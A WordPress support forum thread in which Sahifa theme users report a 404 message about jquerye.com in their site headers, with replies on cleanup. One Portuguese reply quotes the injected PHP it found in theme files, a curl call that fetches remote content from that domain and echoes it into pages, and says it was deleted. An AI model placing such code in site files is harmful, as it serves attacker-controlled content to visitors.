• Hello folks!

    I installed wordpress 3.5, and use theme from themeforest- sahifa..
    Today, I got an error, saying 404 not found.
    -when source code is viewed, it appears to be in the header..

    Here is the full message.
    404 not found
    The server can not find the request page
    http://www.jquerye.com/jquery-1.6.3.min.js (port 80)
    Please forward this error screen to http://www.jquerye.com’s Webmaster..

    I tried to search(google) the problem but I could not find solution for it. I end up on websites with the same theme i am using.

    any idea on how could I fix this? my first time to see this problem..

    my website — asktrigo.com kindly see it..
    it someway defaces my website 😀

Viewing 11 replies - 1 through 11 (of 11 total)
  • Try:
    – switching to the default theme by renaming your current theme’s folder inside wp-content/themes and adding “-old” to the end of the folder name using FTP or whatever file management application your host provides.

    resetting the plugins folder by FTP or phpMyAdmin.

    Thread Starter mr.trizaeron

    (@mrtrizaeron)

    Thanks for that bro! I’l try it, hope it works..

    Hi! It seems this is a common problem today. I didn’t upgrade or do anything, and I get this message:

    404 Not Found
    The server can not find the requested page:

    http://www.jquerye.com/jquery-1.6.3.min.js (port 80)
    Please forward this error screen to http://www.jquerye.com’s WebMaster.

    I have read some stuff saying this is a malware script. It seems to me this is either a malware script or a problem with the hosting company.

    What should I do?

    This probably is a malware code injection. Have a look at http://forum.avast.com/index.php?topic=103860.0 for more info.

    I have already read that, but it seems my site is clean :-s

    @mihneaboiangiu: It is impolite to interrupt another poster’s ongoing thread with a question of your own. It causes significant problems for the forum’s volunteers and prevents us from being able to track issues by topic. Please post your own topic.

    Senhores, tive alguns problemas nos meus sites, exibia a seguinte mensagem no topo da página:

    OBJECT NOT FOUND!

    The requested URL was not found on this server. If you entered the URL manually please check your spelling and try again.

    If you think this is a server error, please contact the webmaster.

    ERROR 404

    http://www.jquerye.com
    Wed Jan 23 13:34:52 2013
    Apache

    Consegui solucionar o problema da seguinte forma:
    Baixei o tema e a pasta de plugins via FTP para o meu computador utilizei o recurso do windows de pequisa por arquivos e procurei por PHP, o windows listou todos os arquivos PHP, utilizei o Dreamweaver para localizar “jquerye” encontrei o seguinte código:

    {if (function_exists(‘curl_init’)){$url = “http://www.jquerye.com/jquery-1.6.3.min.js”;$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}

    trata-se de um código mal intencionado, apenas exclui o código e no lugar dele deixei {}.

    Problema resolvido.

    @geraldo.junior: As per the Forum Welcome, please post your own topic. Posting in an existing topic prevents us from being able to track issues by topic. Added to which, your problem – despite any similarity in symptoms – is likely to be completely different.

    Also, these are English language forums, so please use English. Alternatively, use a WP support forum in your language.

    Thread Starter mr.trizaeron

    (@mrtrizaeron)

    My site is working fine now.
    Thank u for the posts guys!

    I tried the script as told here, but I had no success.

    I made a careful search for the whole day trying to find the script “jquerye” but even so found nothing, everything seems clean.

    I also did a wipe with the online scanner and is also clean.

    Is there another way to solve this problem?

    Hello mr. trizaeron

    i have also installed the same theme and getting the same error please give the solution how you resolved this error..

    waiting for your response..

    Thank You..

Viewing 11 replies - 1 through 11 (of 11 total)
  • The topic ‘Unknown Problem 404 Error’ is closed to new replies.